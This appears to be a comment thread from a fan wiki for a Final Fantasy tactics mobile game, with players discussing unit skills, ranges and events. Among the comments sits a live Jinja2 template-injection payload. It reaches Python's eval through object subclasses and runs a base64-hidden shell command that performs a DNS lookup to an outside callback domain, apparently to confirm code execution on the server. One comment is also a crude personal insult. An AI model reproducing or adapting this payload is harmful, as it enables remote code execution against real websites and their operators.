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Additional Party Effect is for Light Allies, NOT Dark. Why would a Light card with Light Boosts be used by a Dark team?
My apologies
So the jp version collaboration with final fantasy vii during releasing king mont why on global they releasing king mont without any collaboration surely hacker of the game... First hacking account right now hacking the game like you always did to your mom right hacking her ***** every night long
Oh wow they already collaborate with ffvii on 1st part on mac and 2nd part on may and why must your schedule isn't right?
5 times? Gees lol.
faith procs more
Black witch Helena counter. Shell + Spr and ap restore...
I am going to try to get this, have frederika just auto attack all battle :D
9S 14
Thancred says hello.
Damn. That thing is solid AF. Reason alone to build him, he'll go directly to a finished useable char with full items.
Powerful in pvp because most AI will use single target attacks unless turned off. Great in PVE because most atttacks are single.
Chistmas ramada can use?
Curaga 1
I hate it when the caster gets closer to the target of this skill so they can be healed too even with 100% HP. Makes them vulnerable to attacks. Why make this skill ranged (4 squares) if the caster will be beside the target after?
Love this skill... Further range than 9, and she soundly throws hate off herself now easily. Low range height though compared to 9 3 range height on linear+. All in all, glad I 120'd Ramada.
I wonder what the probable chances are it'll take affect.
It's limited in JP since it's a reward from a specific raid. Could be different in global though, who knows?
im surprised an earth element ninja blade didnt come out with Zazan. It would also make Kitone more viable
How much def pen?
It's a PvP medal reward in global.
“Remove guts of targets in range” Is this supposed to be bravery, or flavor text?
For me there are 2 reason: -The changes of activating it ( don't know the exact number but it rarely proc when I use it on fryevia) -The range ( 2 square away isn't exactly reliable)
what's your version of optimal? cheapest way is to put your units into guild barracks and do hard quests to get unit shards, but the fastest way is to just keep buying shards with visiores.
Her? "Dragon King" Bahamut has never been female in any game I'm aware of. ~_~
no. you need dark gloves recipe to craft it. equipments don't upgrade into a different one in this game.
Seems good to me. Agrias regen is nice. He gets that on an AOE hit. Plus more HP, def, 2X fast self heals. For now he'll definitely overtake Engel as a damage soaking tank. Combine with Yuna and Elsie it will be pretty hard to drop those 2. I wouldn't be surprised seeing both of them at 7-9k hp with stacking bonuses and earrings. Some content may be geared towards that.
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{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnZDJWNloyZzBaVGhsWldNME1HOXhZamx3Wm5wNmVtdDJYMloxT1dwaUxYTXlNV2czWjNKMWRuaHlaUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
Don't forget Agrias...
the effects poison and doom res DOWN 25 not +25
Ignoring WoL and just taking the Free Visiore for the FF7 event... It's free real estate
that 40% strike attack and 15% attack up is insane!! good thing the attack and agi stats are low so this won't get too OP
Garvall is more than viable, even at level 100.
Has anyone used these with Kitone/Drain Force?
Viktora 28
what a wonderful time to be alive
No Bingo board for his rerun? I am thinking of pulling for him. I have so many dark units already...but
Typhoon, Aigion, ones that give AOE status elements.
Dude fill on your details this website is so lacking
He actually does now in Global update with Limited bestowed effect for Mace user. It getting more OPer
Finally your wish come true
Cloud, Charlotte, Fred team incoming.
Yes I believe the damage limits an ability can have are the following in increasing order: Min, S, M, L, XL, Max.


Comments (updated every hour)

Yuna 75
Yuna + Princess Garnet team up?
Does this grant the Silence spell at 3 stars?
This guy’s personality pisses me off. I wanna backhand him.
Too many light slash characters already, this one is outdated but TMR is good Need friends add...
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